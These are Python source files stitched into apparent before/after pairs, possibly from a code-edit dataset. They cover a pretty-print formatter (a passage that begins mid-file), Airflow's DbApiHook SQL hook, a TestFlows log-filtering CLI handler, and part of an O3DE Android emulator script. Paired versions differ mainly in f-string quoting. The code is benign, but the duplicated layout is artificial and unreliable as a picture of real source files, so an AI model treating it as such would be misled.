return f"{'':<{0 if no_indent_start else indent}}{src!r}"
def _repr_dict_items(
self,
src: dict[typing.Any, typing.Any],
indent: int = 0,
) -> str:
"""Repr dict items.
:param src: object to process
:type src: dict[typing.Any, typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of key/value pairs from dict
:rtype: str
"""
max_len: int = max(len(repr(key)) for key in src) if src else 0
next_indent: int = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
buf: list[str] = []
for key, val in src.items():
buf.append(prefix)
buf.append(f"{key!r:{max_len}}: ")
buf.append(self.process_element(val, indent=next_indent, no_indent_start=True))
buf.append(",")
return "".join(buf)
@staticmethod
def _repr_iterable_item(
obj_type: str,
prefix: str,
indent: int,
no_indent_start: bool,
result: str,
suffix: str,
) -> str:
"""Repr iterable item.
:param obj_type: Object type
:type obj_type: str
:param prefix: prefix
:type prefix: str
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param result: result of pre-formatting
:type result: str
:param suffix: suffix
:type suffix: str
:return: formatted repr of "result" with prefix and suffix to explain type.
:rtype: str
"""
return f"{'':<{indent if not no_indent_start else 0}}{obj_type}({prefix}{result}\n{'':<{indent}}{suffix})"
class PrettyStr(PrettyFormat):
"""Pretty str.
Designed for usage as __str__ replacement on complex objects
"""
__slots__ = ()
@property
def _magic_method_name(self) -> str:
"""Magic method name.
:rtype: str
"""
return "__pretty_str__"
@staticmethod
def _strings_str(
indent: int,
val: bytes | str,
) -> str:
"""Custom str for strings and binary strings.
:param indent: result indent
:type indent: int
:param val: value for repr
:type val: bytes | str
:return: indented string as `str`
:rtype: str
"""
if isinstance(val, bytes):
string: str = val.decode(encoding="utf-8", errors="backslashreplace")
else:
string = val
return f"{'':<{indent}}{string}"
def _repr_simple(
self,
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
) -> str:
"""Repr object without iteration.
:param src: Source object
:type src: typing.Any
:param indent: start indentation
:type indent: int
:param no_indent_start: ignore indent
:type no_indent_start: bool
:return: simple repr() over object, except strings (decode) and set (uniform py2/py3)
:rtype: str
"""
indent = 0 if no_indent_start else indent
if isinstance(src, (bytes, str)):
return self._strings_str(indent=indent, val=src)
return f"{'':<{indent}}{src!s}"
def _repr_dict_items(
self,
src: dict[typing.Any, typing.Any],
indent: int = 0,
) -> str:
"""Repr dict items.
:param src: object to process
:type src: dict[typing.Any, typing.Any]
:param indent: start indentation
:type indent: int
:return: repr of key/value pairs from dict
:rtype: str
"""
max_len = max(len(str(key)) for key in src) if src else 0
next_indent: int = self.next_indent(indent)
prefix: str = "\n" + " " * next_indent
buf: list[str] = []
for key, val in src.items():
buf.append(prefix)
buf.append(f"{key!s:{max_len}}: ")
buf.append(self.process_element(val, indent=next_indent, no_indent_start=True))
buf.append(",")
return "".join(buf)
@staticmethod
def _repr_iterable_item(
obj_type: str,
prefix: str,
indent: int,
no_indent_start: bool,
result: str,
suffix: str,
) -> str:
"""Repr iterable item.
:param obj_type: Object type
:type obj_type: str
:param prefix: prefix
:type prefix: str
:param indent: start indentation
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param result: result of pre-formatting
:type result: str
:param suffix: suffix
:type suffix: str
:return: formatted repr of "result" with prefix and suffix to explain type.
:rtype: str
"""
return f"{'':<{indent if not no_indent_start else 0}}{prefix}{result}\n{'':<{indent}}{suffix}"
def pretty_repr(
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
max_indent: int = 20,
indent_step: int = 4,
) -> str:
"""Make human readable repr of object.
:param src: object to process
:type src: typing.Any
:param indent: start indentation, all next levels is +indent_step
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param max_indent: maximal indent before classic repr() call
:type max_indent: int
:param indent_step: step for the next indentation level
:type indent_step: int
:return: formatted string
:rtype: str
"""
return PrettyRepr(max_indent=max_indent, indent_step=indent_step)(
src=src,
indent=indent,
no_indent_start=no_indent_start,
)
def pretty_str(
src: typing.Any,
indent: int = 0,
no_indent_start: bool = False,
max_indent: int = 20,
indent_step: int = 4,
) -> str:
"""Make human readable str of object.
:param src: object to process
:type src: typing.Any
:param indent: start indentation, all next levels is +indent_step
:type indent: int
:param no_indent_start: do not indent open bracket and simple parameters
:type no_indent_start: bool
:param max_indent: maximal indent before classic repr() call
:type max_indent: int
:param indent_step: step for the next indentation level
:type indent_step: int
:return: formatted string
"""
return PrettyStr(max_indent=max_indent, indent_step=indent_step)(
src=src,
indent=indent,
no_indent_start=no_indent_start,
)
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from contextlib import closing
from datetime import datetime
from typing import Any, Optional
from urllib.parse import quote_plus
from sqlalchemy import create_engine
from airflow.exceptions import AirflowException
from airflow.hooks.base import BaseHook
from airflow.typing_compat import Protocol
class ConnectorProtocol(Protocol):
"""A protocol where you can connect to a database."""
def connect(self, host: str, port: int, username: str, schema: str) -> Any:
"""
Connect to a database.
:param host: The database host to connect to.
:param port: The database port to connect to.
:param username: The database username used for the authentication.
:param schema: The database schema to connect to.
:return: the authorized connection object.
"""
class DbApiHook(BaseHook):
"""Abstract base class for sql hooks."""
# Override to provide the connection name.
conn_name_attr = None # type: str
# Override to have a default connection id for a particular dbHook
default_conn_name = 'default_conn_id'
# Override if this db supports autocommit.
supports_autocommit = False
# Override with the object that exposes the connect method
connector = None # type: Optional[ConnectorProtocol]
def __init__(self, *args, **kwargs):
super().__init__()
if not self.conn_name_attr:
raise AirflowException("conn_name_attr is not defined")
elif len(args) == 1:
setattr(self, self.conn_name_attr, args[0])
elif self.conn_name_attr not in kwargs:
setattr(self, self.conn_name_attr, self.default_conn_name)
else:
setattr(self, self.conn_name_attr, kwargs[self.conn_name_attr])
def get_conn(self):
"""Returns a connection object"""
db = self.get_connection(getattr(self, self.conn_name_attr))
return self.connector.connect(host=db.host, port=db.port, username=db.login, schema=db.schema)
def get_uri(self) -> str:
"""
Extract the URI from the connection.
:return: the extracted uri.
"""
conn = self.get_connection(getattr(self, self.conn_name_attr))
login = ''
if conn.login:
login = f'{quote_plus(conn.login)}:{quote_plus(conn.password)}@'
host = conn.host
if conn.port is not None:
host += f':{conn.port}'
uri = f'{conn.conn_type}://{login}{host}/'
if conn.schema:
uri += conn.schema
return uri
def get_sqlalchemy_engine(self, engine_kwargs=None):
"""
Get an sqlalchemy_engine object.
:param engine_kwargs: Kwargs used in :func:`~sqlalchemy.create_engine`.
:return: the created engine.
"""
if engine_kwargs is None:
engine_kwargs = {}
return create_engine(self.get_uri(), **engine_kwargs)
def get_pandas_df(self, sql, parameters=None, **kwargs):
"""
Executes the sql and returns a pandas dataframe
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
:param kwargs: (optional) passed into pandas.io.sql.read_sql method
:type kwargs: dict
"""
from pandas.io import sql as psql
with closing(self.get_conn()) as conn:
return psql.read_sql(sql, con=conn, params=parameters, **kwargs)
def get_records(self, sql, parameters=None):
"""
Executes the sql and returns a set of records.
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
"""
with closing(self.get_conn()) as conn:
with closing(conn.cursor()) as cur:
if parameters is not None:
cur.execute(sql, parameters)
else:
cur.execute(sql)
return cur.fetchall()
def get_first(self, sql, parameters=None):
"""
Executes the sql and returns the first resulting row.
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
"""
with closing(self.get_conn()) as conn:
with closing(conn.cursor()) as cur:
if parameters is not None:
cur.execute(sql, parameters)
else:
cur.execute(sql)
return cur.fetchone()
def run(self, sql, autocommit=False, parameters=None, handler=None):
"""
Runs a command or a list of commands. Pass a list of sql
statements to the sql parameter to get them to execute
sequentially
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param autocommit: What to set the connection's autocommit setting to
before executing the query.
:type autocommit: bool
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
:param handler: The result handler which is called with the result of each statement.
:type handler: callable
:return: query results if handler was provided.
"""
scalar = isinstance(sql, str)
if scalar:
sql = [sql]
with closing(self.get_conn()) as conn:
if self.supports_autocommit:
self.set_autocommit(conn, autocommit)
with closing(conn.cursor()) as cur:
results = []
for sql_statement in sql:
self._run_command(cur, sql_statement, parameters)
if handler is not None:
result = handler(cur)
results.append(result)
# If autocommit was set to False for db that supports autocommit,
# or if db does not supports autocommit, we do a manual commit.
if not self.get_autocommit(conn):
conn.commit()
if handler is None:
return None
if scalar:
return results[0]
return results
def _run_command(self, cur, sql_statement, parameters):
"""Runs a statement using an already open cursor."""
self.log.info("Running statement: %s, parameters: %s", sql_statement, parameters)
if parameters:
cur.execute(sql_statement, parameters)
else:
cur.execute(sql_statement)
# According to PEP 249, this is -1 when query result is not applicable.
if cur.rowcount >= 0:
self.log.info("Rows affected: %s", cur.rowcount)
def set_autocommit(self, conn, autocommit):
"""Sets the autocommit flag on the connection"""
if not self.supports_autocommit and autocommit:
self.log.warning(
"%s connection doesn't support autocommit but autocommit activated.",
getattr(self, self.conn_name_attr),
)
conn.autocommit = autocommit
def get_autocommit(self, conn):
"""
Get autocommit setting for the provided connection.
Return True if conn.autocommit is set to True.
Return False if conn.autocommit is not set or set to False or conn
does not support autocommit.
:param conn: Connection to get autocommit setting from.
:type conn: connection object.
:return: connection autocommit setting.
:rtype: bool
"""
return getattr(conn, 'autocommit', False) and self.supports_autocommit
def get_cursor(self):
"""Returns a cursor"""
return self.get_conn().cursor()
@staticmethod
def _generate_insert_sql(table, values, target_fields, replace, **kwargs):
"""
Static helper method that generate the INSERT SQL statement.
The REPLACE variant is specific to MySQL syntax.
:param table: Name of the target table
:type table: str
:param values: The row to insert into the table
:type values: tuple of cell values
:param target_fields: The names of the columns to fill in the table
:type target_fields: iterable of strings
:param replace: Whether to replace instead of insert
:type replace: bool
:return: The generated INSERT or REPLACE SQL statement
:rtype: str
"""
placeholders = [
"%s",
] * len(values)
if target_fields:
target_fields = ", ".join(target_fields)
target_fields = f"({target_fields})"
else:
target_fields = ''
if not replace:
sql = "INSERT INTO "
else:
sql = "REPLACE INTO "
sql += f"{table} {target_fields} VALUES ({",".join(placeholders)})"
return sql
def insert_rows(self, table, rows, target_fields=None, commit_every=1000, replace=False, **kwargs):
"""
A generic way to insert a set of tuples into a table,
a new transaction is created every commit_every rows
:param table: Name of the target table
:type table: str
:param rows: The rows to insert into the table
:type rows: iterable of tuples
:param target_fields: The names of the columns to fill in the table
:type target_fields: iterable of strings
:param commit_every: The maximum number of rows to insert in one
transaction. Set to 0 to insert all rows in one transaction.
:type commit_every: int
:param replace: Whether to replace instead of insert
:type replace: bool
"""
i = 0
with closing(self.get_conn()) as conn:
if self.supports_autocommit:
self.set_autocommit(conn, False)
conn.commit()
with closing(conn.cursor()) as cur:
for i, row in enumerate(rows, 1):
lst = []
for cell in row:
lst.append(self._serialize_cell(cell, conn))
values = tuple(lst)
sql = self._generate_insert_sql(table, values, target_fields, replace, **kwargs)
cur.execute(sql, values)
if commit_every and i % commit_every == 0:
conn.commit()
self.log.info("Loaded %s rows into %s so far", i, table)
conn.commit()
self.log.info("Done loading. Loaded a total of %s rows", i)
@staticmethod
def _serialize_cell(cell, conn=None): # pylint: disable=unused-argument
"""
Returns the SQL literal of the cell as a string.
:param cell: The cell to insert into the table
:type cell: object
:param conn: The database connection
:type conn: connection object
:return: The serialized cell
:rtype: str
"""
if cell is None:
return None
if isinstance(cell, datetime):
return cell.isoformat()
return str(cell)
def bulk_dump(self, table, tmp_file):
"""
Dumps a database table into a tab-delimited file
:param table: The name of the source table
:type table: str
:param tmp_file: The path of the target file
:type tmp_file: str
"""
raise NotImplementedError()
def bulk_load(self, table, tmp_file):
"""
Loads a tab-delimited file into a database table
:param table: The name of the target table
:type table: str
:param tmp_file: The path of the file to load into the table
:type tmp_file: str
"""
raise NotImplementedError()
def test_connection(self):
"""Tests the connection by executing a select 1 query"""
status, message = False, ''
try:
with closing(self.get_conn()) as conn:
with closing(conn.cursor()) as cur:
cur.execute("select 1")
if cur.fetchone():
status = True
message = 'Connection successfully tested'
except Exception as e: # noqa pylint: disable=broad-except
status = False
message = str(e)
return status, message
| #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from contextlib import closing
from datetime import datetime
from typing import Any, Optional
from urllib.parse import quote_plus
from sqlalchemy import create_engine
from airflow.exceptions import AirflowException
from airflow.hooks.base import BaseHook
from airflow.typing_compat import Protocol
class ConnectorProtocol(Protocol):
"""A protocol where you can connect to a database."""
def connect(self, host: str, port: int, username: str, schema: str) -> Any:
"""
Connect to a database.
:param host: The database host to connect to.
:param port: The database port to connect to.
:param username: The database username used for the authentication.
:param schema: The database schema to connect to.
:return: the authorized connection object.
"""
class DbApiHook(BaseHook):
"""Abstract base class for sql hooks."""
# Override to provide the connection name.
conn_name_attr = None # type: str
# Override to have a default connection id for a particular dbHook
default_conn_name = 'default_conn_id'
# Override if this db supports autocommit.
supports_autocommit = False
# Override with the object that exposes the connect method
connector = None # type: Optional[ConnectorProtocol]
def __init__(self, *args, **kwargs):
super().__init__()
if not self.conn_name_attr:
raise AirflowException("conn_name_attr is not defined")
elif len(args) == 1:
setattr(self, self.conn_name_attr, args[0])
elif self.conn_name_attr not in kwargs:
setattr(self, self.conn_name_attr, self.default_conn_name)
else:
setattr(self, self.conn_name_attr, kwargs[self.conn_name_attr])
def get_conn(self):
"""Returns a connection object"""
db = self.get_connection(getattr(self, self.conn_name_attr))
return self.connector.connect(host=db.host, port=db.port, username=db.login, schema=db.schema)
def get_uri(self) -> str:
"""
Extract the URI from the connection.
:return: the extracted uri.
"""
conn = self.get_connection(getattr(self, self.conn_name_attr))
login = ''
if conn.login:
login = f'{quote_plus(conn.login)}:{quote_plus(conn.password)}@'
host = conn.host
if conn.port is not None:
host += f':{conn.port}'
uri = f'{conn.conn_type}://{login}{host}/'
if conn.schema:
uri += conn.schema
return uri
def get_sqlalchemy_engine(self, engine_kwargs=None):
"""
Get an sqlalchemy_engine object.
:param engine_kwargs: Kwargs used in :func:`~sqlalchemy.create_engine`.
:return: the created engine.
"""
if engine_kwargs is None:
engine_kwargs = {}
return create_engine(self.get_uri(), **engine_kwargs)
def get_pandas_df(self, sql, parameters=None, **kwargs):
"""
Executes the sql and returns a pandas dataframe
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
:param kwargs: (optional) passed into pandas.io.sql.read_sql method
:type kwargs: dict
"""
from pandas.io import sql as psql
with closing(self.get_conn()) as conn:
return psql.read_sql(sql, con=conn, params=parameters, **kwargs)
def get_records(self, sql, parameters=None):
"""
Executes the sql and returns a set of records.
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
"""
with closing(self.get_conn()) as conn:
with closing(conn.cursor()) as cur:
if parameters is not None:
cur.execute(sql, parameters)
else:
cur.execute(sql)
return cur.fetchall()
def get_first(self, sql, parameters=None):
"""
Executes the sql and returns the first resulting row.
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
"""
with closing(self.get_conn()) as conn:
with closing(conn.cursor()) as cur:
if parameters is not None:
cur.execute(sql, parameters)
else:
cur.execute(sql)
return cur.fetchone()
def run(self, sql, autocommit=False, parameters=None, handler=None):
"""
Runs a command or a list of commands. Pass a list of sql
statements to the sql parameter to get them to execute
sequentially
:param sql: the sql statement to be executed (str) or a list of
sql statements to execute
:type sql: str or list
:param autocommit: What to set the connection's autocommit setting to
before executing the query.
:type autocommit: bool
:param parameters: The parameters to render the SQL query with.
:type parameters: dict or iterable
:param handler: The result handler which is called with the result of each statement.
:type handler: callable
:return: query results if handler was provided.
"""
scalar = isinstance(sql, str)
if scalar:
sql = [sql]
with closing(self.get_conn()) as conn:
if self.supports_autocommit:
self.set_autocommit(conn, autocommit)
with closing(conn.cursor()) as cur:
results = []
for sql_statement in sql:
self._run_command(cur, sql_statement, parameters)
if handler is not None:
result = handler(cur)
results.append(result)
# If autocommit was set to False for db that supports autocommit,
# or if db does not supports autocommit, we do a manual commit.
if not self.get_autocommit(conn):
conn.commit()
if handler is None:
return None
if scalar:
return results[0]
return results
def _run_command(self, cur, sql_statement, parameters):
"""Runs a statement using an already open cursor."""
self.log.info("Running statement: %s, parameters: %s", sql_statement, parameters)
if parameters:
cur.execute(sql_statement, parameters)
else:
cur.execute(sql_statement)
# According to PEP 249, this is -1 when query result is not applicable.
if cur.rowcount >= 0:
self.log.info("Rows affected: %s", cur.rowcount)
def set_autocommit(self, conn, autocommit):
"""Sets the autocommit flag on the connection"""
if not self.supports_autocommit and autocommit:
self.log.warning(
"%s connection doesn't support autocommit but autocommit activated.",
getattr(self, self.conn_name_attr),
)
conn.autocommit = autocommit
def get_autocommit(self, conn):
"""
Get autocommit setting for the provided connection.
Return True if conn.autocommit is set to True.
Return False if conn.autocommit is not set or set to False or conn
does not support autocommit.
:param conn: Connection to get autocommit setting from.
:type conn: connection object.
:return: connection autocommit setting.
:rtype: bool
"""
return getattr(conn, 'autocommit', False) and self.supports_autocommit
def get_cursor(self):
"""Returns a cursor"""
return self.get_conn().cursor()
@staticmethod
def _generate_insert_sql(table, values, target_fields, replace, **kwargs):
"""
Static helper method that generate the INSERT SQL statement.
The REPLACE variant is specific to MySQL syntax.
:param table: Name of the target table
:type table: str
:param values: The row to insert into the table
:type values: tuple of cell values
:param target_fields: The names of the columns to fill in the table
:type target_fields: iterable of strings
:param replace: Whether to replace instead of insert
:type replace: bool
:return: The generated INSERT or REPLACE SQL statement
:rtype: str
"""
placeholders = [
"%s",
] * len(values)
if target_fields:
target_fields = ", ".join(target_fields)
target_fields = f"({target_fields})"
else:
target_fields = ''
if not replace:
sql = "INSERT INTO "
else:
sql = "REPLACE INTO "
sql += f"{table} {target_fields} VALUES ({','.join(placeholders)})"
return sql
def insert_rows(self, table, rows, target_fields=None, commit_every=1000, replace=False, **kwargs):
"""
A generic way to insert a set of tuples into a table,
a new transaction is created every commit_every rows
:param table: Name of the target table
:type table: str
:param rows: The rows to insert into the table
:type rows: iterable of tuples
:param target_fields: The names of the columns to fill in the table
:type target_fields: iterable of strings
:param commit_every: The maximum number of rows to insert in one
transaction. Set to 0 to insert all rows in one transaction.
:type commit_every: int
:param replace: Whether to replace instead of insert
:type replace: bool
"""
i = 0
with closing(self.get_conn()) as conn:
if self.supports_autocommit:
self.set_autocommit(conn, False)
conn.commit()
with closing(conn.cursor()) as cur:
for i, row in enumerate(rows, 1):
lst = []
for cell in row:
lst.append(self._serialize_cell(cell, conn))
values = tuple(lst)
sql = self._generate_insert_sql(table, values, target_fields, replace, **kwargs)
cur.execute(sql, values)
if commit_every and i % commit_every == 0:
conn.commit()
self.log.info("Loaded %s rows into %s so far", i, table)
conn.commit()
self.log.info("Done loading. Loaded a total of %s rows", i)
@staticmethod
def _serialize_cell(cell, conn=None): # pylint: disable=unused-argument
"""
Returns the SQL literal of the cell as a string.
:param cell: The cell to insert into the table
:type cell: object
:param conn: The database connection
:type conn: connection object
:return: The serialized cell
:rtype: str
"""
if cell is None:
return None
if isinstance(cell, datetime):
return cell.isoformat()
return str(cell)
def bulk_dump(self, table, tmp_file):
"""
Dumps a database table into a tab-delimited file
:param table: The name of the source table
:type table: str
:param tmp_file: The path of the target file
:type tmp_file: str
"""
raise NotImplementedError()
def bulk_load(self, table, tmp_file):
"""
Loads a tab-delimited file into a database table
:param table: The name of the target table
:type table: str
:param tmp_file: The path of the file to load into the table
:type tmp_file: str
"""
raise NotImplementedError()
def test_connection(self):
"""Tests the connection by executing a select 1 query"""
status, message = False, ''
try:
with closing(self.get_conn()) as conn:
with closing(conn.cursor()) as cur:
cur.execute("select 1")
if cur.fetchone():
status = True
message = 'Connection successfully tested'
except Exception as e: # noqa pylint: disable=broad-except
status = False
message = str(e)
return status, message
|
# Copyright 2021 Katteli Inc.
# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import testflows._core.cli.arg.type as argtype
from testflows._core.cli.arg.common import epilog
from testflows._core.cli.arg.common import HelpFormatter
from testflows._core.cli.arg.handlers.handler import Handler as HandlerBase
from testflows._core.message import Message
from testflows._core.transform.log.pipeline import Pipeline as PipelineBase
from testflows._core.transform.log.read_and_filter import transform as read_and_filter_transform
from testflows._core.transform.log.flat import transform as flat_transform
from testflows._core.transform.log.parse import transform as parse_transform
from testflows._core.transform.log.stop import transform as stop_transform
from testflows._core.transform.log.write import transform as write_transform
class Handler(HandlerBase):
@classmethod
def add_command(cls, commands):
parser = commands.add_parser("description", help="description", epilog=epilog(),
description="Show description.",
formatter_class=HelpFormatter)
parser.add_argument("name", metavar="name", type=str, help="test name", default="", nargs="?")
parser.add_argument("--log", metavar="input", type=argtype.logfile("r", bufsize=1, encoding="utf-8"),
nargs="?", help="input log, default: stdin", default="-")
parser.add_argument("--output", metavar="output", type=argtype.file("w", bufsize=1, encoding="utf-8"),
nargs="?", help='output, default: stdout', default="-")
parser.set_defaults(func=cls())
class Pipeline(PipelineBase):
def __init__(self, name, input, output, tail=False):
stop_event = threading.Event()
message_types = [
Message.TEST.name
]
command = "grep -E '^{\"message_keyword\":\""
command = f"{command}({"|".join(message_types)})\""
command += ".+,\"test_name\":\"%s.*?\",'" % name.replace("'", r"'\''")
steps = [
read_and_filter_transform(input, command=command, stop=stop_event, tail=tail),
parse_transform(),
flat_transform(),
write_transform(output),
stop_transform(stop_event)
]
super(Handler.Pipeline, self).__init__(steps, stop=stop_event)
def handle(self, args):
self.Pipeline(args.name, args.log, args.output, tail=True).run() | # Copyright 2021 Katteli Inc.
# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import testflows._core.cli.arg.type as argtype
from testflows._core.cli.arg.common import epilog
from testflows._core.cli.arg.common import HelpFormatter
from testflows._core.cli.arg.handlers.handler import Handler as HandlerBase
from testflows._core.message import Message
from testflows._core.transform.log.pipeline import Pipeline as PipelineBase
from testflows._core.transform.log.read_and_filter import transform as read_and_filter_transform
from testflows._core.transform.log.flat import transform as flat_transform
from testflows._core.transform.log.parse import transform as parse_transform
from testflows._core.transform.log.stop import transform as stop_transform
from testflows._core.transform.log.write import transform as write_transform
class Handler(HandlerBase):
@classmethod
def add_command(cls, commands):
parser = commands.add_parser("description", help="description", epilog=epilog(),
description="Show description.",
formatter_class=HelpFormatter)
parser.add_argument("name", metavar="name", type=str, help="test name", default="", nargs="?")
parser.add_argument("--log", metavar="input", type=argtype.logfile("r", bufsize=1, encoding="utf-8"),
nargs="?", help="input log, default: stdin", default="-")
parser.add_argument("--output", metavar="output", type=argtype.file("w", bufsize=1, encoding="utf-8"),
nargs="?", help='output, default: stdout', default="-")
parser.set_defaults(func=cls())
class Pipeline(PipelineBase):
def __init__(self, name, input, output, tail=False):
stop_event = threading.Event()
message_types = [
Message.TEST.name
]
command = "grep -E '^{\"message_keyword\":\""
command = f"{command}({'|'.join(message_types)})\""
command += ".+,\"test_name\":\"%s.*?\",'" % name.replace("'", r"'\''")
steps = [
read_and_filter_transform(input, command=command, stop=stop_event, tail=tail),
parse_transform(),
flat_transform(),
write_transform(output),
stop_transform(stop_event)
]
super(Handler.Pipeline, self).__init__(steps, stop=stop_event)
def handle(self, args):
self.Pipeline(args.name, args.log, args.output, tail=True).run() |
#
# Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
import argparse
import os
import pathlib
import re
import sys
import subprocess
import time
import logging
CURRENT_PATH = pathlib.Path(os.path.dirname(__file__)).absolute()
# The engine root is based on the location of this file (<ENGINE_ROOT>/scripts/build/Platform/Android). Walk up to calculate the engine root
ENGINE_ROOT = CURRENT_PATH.parents[3]
class AndroidEmuError(Exception):
pass
def get_android_sdk_path():
try:
android_sdk_path = pathlib.Path(os.getenv('LY_ANDROID_SDK'))
if not android_sdk_path:
raise AndroidEmuError(f"LY_ANDROID_SDK environment variable is not set")
if not android_sdk_path.is_dir():
raise AndroidEmuError(f"Android SDK Path ('{android_sdk_path}') set with the LY_ANDROID_SDK variable is invalid")
#TODO: Sanity check on necessary files
return android_sdk_path
except Exception as err:
raise AndroidEmuError(f"Unable to determine android SDK path: {err}")
class Command(object):
def __init__(self, tool_name, tool_path, run_as_shell=True):
if not tool_path.is_file():
raise AndroidEmuError(f"Invalid path for {tool_name}. Cannot find ('{tool_path.absolute()}')")
self.tool_path = tool_path
self.run_as_shell = run_as_shell
def run_return_output(self, cmd_args):
args = [str(self.tool_path)]
if isinstance(cmd_args, str):
args.append(cmd_args)
elif isinstance(cmd_args, list):
args.extend(cmd_args)
else:
assert False, "run_return_output argument must be a string or list of strings"
full_cmd = subprocess.list2cmdline(args)
logging.debug(f"run_return_output: {full_cmd}")
run_result = subprocess.run(args,
capture_output=True,
encoding='UTF-8',
errors='ignore',
shell=self.run_as_shell)
if run_result.returncode != 0:
raise AndroidEmuError(f"Error executing command '{full_cmd}' (return code {run_result.returncode}): {run_result.stderr}")
return run_result.stdout
def run(self, cmd_args, cwd=None, suppress_output=False):
args = [str(self.tool_path)]
if isinstance(cmd_args, str):
args.append(cmd_args)
elif isinstance(cmd_args, list):
args.extend(cmd_args)
else:
assert False, "run_return_output argument must be a string or list of strings"
full_cmd = subprocess.list2cmdline(args)
logging.debug(f"run: {full_cmd}")
run_result = subprocess.run(args,
#stdout=subprocess.DEVNULL if suppress_output else subprocess.STDOUT,
capture_output=False,
shell=self.run_as_shell,
cwd=cwd)
if run_result.returncode != 0:
raise AndroidEmuError(f"Error executing command '{full_cmd}' (return code {run_result.returncode}): {run_result.stderr}")
def run_process(self, cmd_args):
args = [str(self.tool_path)]
if isinstance(cmd_args, str):
args.append(cmd_args)
elif isinstance(cmd_args, list):
args.extend(cmd_args)
else:
assert False, "run_return_output argument must be a string or list of strings"
full_cmd = subprocess.list2cmdline(args)
logging.debug(f"run_process: {full_cmd}")
process = subprocess.Popen(args,
shell=True,
stdout=subprocess.PIPE,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.NORMAL_PRIORITY_CLASS |
subprocess.CREATE_NO_WINDOW,
encoding='UTF-8',
errors='ignore')
return process
class AndroidEmulatorManager(object):
UNIT_TEST_AVD_NAME = "LY_UNITTEST_AVD"
UNIT_TEST_SYSTEM_IMAGE_PACKAGE = "android-30;google_apis;x86_64"
UNIT_TEST_DEVICE_TEMPLATE_NAME = "pixel_xl"
UNIT_TEST_DEVICE_SETTINGS_MAP = {
"disk.dataPartition.size": "32G",
"vm.heapSize": "1024",
"hw.ramSize": "2048",
"hw.sdCard": "no"
}
EMULATOR_STARTUP_TIMEOUT_SECS = 60*5 # Set the emulator startup timeout to 5 minutes
def __init__(self, base_android_sdk_path, hide_emulator_windows=True, force_avd_creation=False, emulator_startup_timeout=EMULATOR_STARTUP_TIMEOUT_SECS):
self.android_sdk_path = base_android_sdk_path
self.force_avd_creation = force_avd_creation
self.unit_test_avd_name = AndroidEmulatorManager.UNIT_TEST_AVD_NAME
self.unit_test_device_template_name = AndroidEmulatorManager.UNIT_TEST_DEVICE_TEMPLATE_NAME
self.unit_test_device_settings_map = AndroidEmulatorManager.UNIT_TEST_DEVICE_SETTINGS_MAP
self.unit_test_avd_system_image = AndroidEmulatorManager.UNIT_TEST_SYSTEM_IMAGE_PACKAGE
self.hide_emulator_windows = hide_emulator_windows
self.emulator_startup_timeout = emulator_startup_timeout
self.emulator_cmd = Command("Emulator", self.android_sdk_path / 'emulator' / 'emulator.exe')
